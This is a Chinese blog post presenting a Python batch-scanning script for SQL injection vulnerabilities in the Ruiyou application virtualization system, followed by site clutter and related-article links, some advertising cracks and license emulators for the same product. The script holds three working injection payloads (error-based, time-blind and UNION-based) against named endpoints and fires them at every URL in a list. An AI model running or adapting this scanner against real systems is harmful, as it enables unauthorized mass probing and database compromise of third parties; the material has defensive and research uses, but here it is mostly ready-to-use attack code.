python手搓天翼瑞友应用虚拟化系统漏洞检测工具

最新推荐文章于 2024-07-17 21:04:45 发布
最新推荐文章于 2024-07-17 21:04:45 发布
阅读量148 收藏 1
点赞数 2
分类专栏: Python学习 文章标签: python 开发语言 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55213436/article/details/140453023
版权

日常漏洞复现写的一些批量检测脚本

import requests
from requests.exceptions import RequestException
import re
import time

url_list=[]
###poc区
def poc(url):
    header={
        "User-Agent": "Mozilla/5.0 (Macintosh; Izntel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1"
    }

    data= {
        "poc1":"/index.php?s=/Admin/appsave&appid=3') AND (SELECT 2590 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT (ELT(2590=2590,1))),0x7162786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ITBH",
        "poc2":"/AgentBoard.XGI?user=1'+AND+(SELECT+8599+FROM+(SELECT(SLEEP(10)))ybrN)+AND+'NjRv'='NjRv&cmd=UserLogin HTTP/1.1",
        "poc3":"/ConsoleExternalApi.XGI?key=inner&initParams=command_getAppVisitLogByDataTable__user_admin__pwd_xxx__serverIdStr_1&sign=0a3d5f4f69628f32217ea9704d12bd6d&iDisplayStart=1+union+select+1,2,3,4,5,md5(1)# "
    }

    url1 = url+data["poc1"]
    url2 = url+data["poc2"]
    url3 = url+data["poc3"]

    try:
        respose1 = requests.get(url=url1,headers=header,timeout=2)
        content1 = respose1.text

        start_time = time.time()
        requests.get(url=url2,headers=header,timeout=15)
        elapsed_time =int( time.time() - start_time)

        respose3 = requests.get(url=url3,headers=header,timeout=2)
        content3 = respose3.text

        return content1,elapsed_time,content3
        
    except RequestException as e:
        pass

##判断shi否存在漏洞
def panduan():
    with open("reslut.txt", "w") as f:
        with open("url.txt", "r") as k:
            for url in k:
                url = url.strip()  # 去掉 URL 两端的空白字符
                result = poc(url)  # 调用 poc 函数

                if result is not None:
                    con1, time2, con2 = result
                else:
                    con1, time2, con2 = '', 0, ''  # 如果返回 None,使用默认值

                pattern1 = re.compile(r'Duplicate entry', re.IGNORECASE)
                matches1 = pattern1.findall(str(con1))

                pattern2 = re.compile(r'c4ca4238a0b923820dcc509a6f75849b', re.IGNORECASE)
                matches2 = pattern2.findall(str(con2))

                if matches2 and matches1 and time2 >= 8:
                    print(f"appsave|ConsoleExternalApi|AgentBoard.XGI盲注:{url}")
                    f.write(f"appsave|ConsoleExternalApi|AgentBoard.XGI盲注:{url}\n")
                elif matches2 and matches1:
                    print(f"appsave|ConsoleExternalApi:{url}")
                    f.write(f"appsave|ConsoleExternalApi:{url}\n")
                elif matches2 and time2 >= 8:
                    print(f"ConsoleExternalApi|AgentBoard.XGI盲注:{url}")
                    f.write(f"ConsoleExternalApi|AgentBoard.XGI盲注:{url}\n")
                elif matches1 and time2 >= 8:
                    print(f"appsave|AgentBoard.XGI盲注:{url}")
                    f.write(f"appsave|AgentBoard.XGI盲注:{url}\n")
                elif matches1:
                    print(f"appsave SQL注入漏洞:{url}")
                    f.write(f"appsave SQL注入漏洞:{url}\n")
                elif matches2:
                    print(f"ConsoleExternalApi.XGI SQL注入漏洞:{url}")
                    f.write(f"ConsoleExternalApi.XGI SQL注入漏洞:{url}\n")
                elif time2 >= 8:
                    print(f"AgentBoard.XGI盲注:{url}")
                    f.write(f"AgentBoard.XGI盲注:{url}\n")
                else:
                    print(f"{url}不存在瑞友注入漏洞")

if __name__ == '__main__':
    panduan()

运行结果

网安第一深禽
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
weixin_72543266的博客
04-22 1357
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
漏洞复现 POC 综合
qq_56895879的博客
08-14 926
漏洞复现
[工具使用]黑暗引擎FOFA
热门推荐
网络安全知识分享
08-29 3万+
黑暗引擎FOFAFOFA(点我进入)逻辑运算符搜索子域名domain搜索指定内容的host全部域名bodycert搜索选定应用的网站搜索指定开放端口的IP搜索指定协议的IP搜索IP或者网段的信息搜索指定CSS/JS网站常用的一些内容其他 FOFA(点我进入) 官网这样描述:FOFA是白帽汇推出的一款网络空间资产搜索引擎。它能够帮助用户迅速进行网络资产匹配、加快后续工作进程。例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。 简单理解就是,一个本土加强版shodan,知道某产品在互联网的部署情况、
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 627
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Apache (Web服务器软件)
学英语的程序员
03-07 3093
Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。 Apache HTTPServer(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的A..
渗透测试-信息收集专题
aming小老弟
12-15 431
信息收集 思路框架知识整理 ​​主动信息收集-直接访问[工具]打点​​​​收集内容​​​​自动收集大厂 过滤​​​​运营商​​​​1 收集可能存在sql注入的url​​​​路径 后缀​​​​公司架构​​​​产品规格​​​​网站标题​​​​全国省市县分布​​​​国外脆弱​​​​被动信息收集-第三方服务打点​​​​信息收集-...
应用虚拟系统6.0软注册配置工具
07-31
应用虚拟系统6.0是一款高效的企业级软件解决方案,旨在提供远程访问、应用发布和资源管理服务。该系统的核心理念是通过虚拟技术将应用程序从硬件上分离出来,让用户能够在任何时间、任何地点,只要网络...
应用虚拟系统6.0
07-31
应用虚拟系统6.0详解》 应用虚拟系统6.0是一款高效的企业级应用发布与管理平台,旨在解决企业内部应用部署、访问及管理的问题,尤其适用于多终端、远程办公以及分布式企业环境。这款系统通过...
应用虚拟系统(GWT)V6.0服务器端和谐补丁
06-29
应用虚拟系统(GWT)V6.0是一款高效的企业级软件解决方案,旨在将应用程序的运行和管理从本地设备上移至云端,从而实现远程访问、集中管理和优资源分配。这款系统的核心是将应用软件转为可以通过网络...
应用虚拟系统(GWT)V7.0服务器端和谐补丁
06-29
应用虚拟系统(GWT)V7.0是一款专为企事业单位设计的高效、安全的应用交付平台。该系统基于应用虚拟技术,旨在解决远程访问、多终端兼容性、网络延迟等问题,为企业提供无缝的应用部署和管理解决方案。 ...
应用虚拟系统6.0license模拟器
07-31
总的来说,应用虚拟系统6.0为企业提供了一种高效、灵活且安全的方式来管理和交付应用程序,而许可证模拟器则是确保这一过程顺畅的关键工具。深入了解并熟练掌握这些知识点,将有助于企业在IT资源管理上...
cv2读取和保存图片
m0_53291740的博客
07-12 269
cv2.imwrite('b\\img1.png',img)#b存在就可以保存进去。如果b存在,c不存在,程序不会报错,也不会保存图片。如果目录b不存在就会存到当前文件夹。
《JavaSE》---6.<基础语法(Java三大程序控制结构)>
m0_73456341的博客
07-14 787
本篇博客主要讲解Java基础语法中的三大结构,一种顺序结构、两大分支结构i(if-else、swich-case)、四大循环结构(while、do while、fot、foreach)
华为od机试真题 — 代表团坐车(Python)
学习,你不是一个人在战斗 ~ 961302305(QQ,微信)
07-17 527
【华为od机试真题 】代表团坐车(Python) 某组织举行会议,来了多个代表团同时到达,接待处只有一辆汽车可以同时接待多个代表团,为了提高车辆利用率,请帮接待员计算可以坐满车的接待方案输出方案数量。
IPython 日志秘籍:%logstate 命令全解析
2401_85812026的博客
07-17 490
logstate命令是 IPython 日志系统的重要组成部分,它帮助我们掌控日志记录的状态。通过本文的介绍,你应该对如何在 IPython 中使用%logstate查看日志状态有了更深入的理解。记住,合理利用日志系统,可以让你的数据探索过程更加透明和可追溯。本文详细介绍了 IPython 的%logstate命令,包括其基本概念、基本用法、输出解析以及实战示例。希望本文能够帮助读者更好地利用 IPython 的日志系统,优数据探索和科学计算的工作流。记住,掌握%logstate。
Python每日一题:回文数
xiongxiaoxuan的博客
07-16 236
回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。例如,121 是回文,而 123 不是。给你一个整数 x ,如果 x 是一个回文整数,返回 true;否则,返回 false。解释:从左向右读, 为 -121。从右向左读, 为 121-。因此它不是一个回文数。先将整数x转为字符串形式,判断x和它的反转形态是否完全相等。解释:从右向左读, 为 01。需注意:True和False首字母大写!提示:-231
N7翻译实战
最新发布
tjl521314_21的博客
07-17 225
本周完成项目实战用于训练一个简单的序列到序列(seq2seq)模型以实现英语到法语的翻译。数据预处理、模型构建、训练以及可视损失的过程。本周学习了构建和训练一个简单的seq2seq模型用于英语到法语的翻译,对前面的知识做了一个综合的运用。
Gradio从入门到精通(1)---快速入门
疯狂飙车的蜗牛的博客
07-15 1362
Gradio 是一个开源 Python 包,允许您为机器学习模型、API 或任何任意 Python 函数快速构建演示或 Web 应用程序。然后,您可以使用 Gradio 的内置共享功能在几秒钟内共享指向演示或 Web 应用程序的链接。无需 JavaScript、CSS 或 Web 托管经验!Gradio最大的特点就是简单,便捷,短短几行代码就可以快速构建大模型web应用程序;当前很多人工智能模型的演示都是使用Gradio打造的;您会注意到,为了制作第一个演示,您创建了该类的实例。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值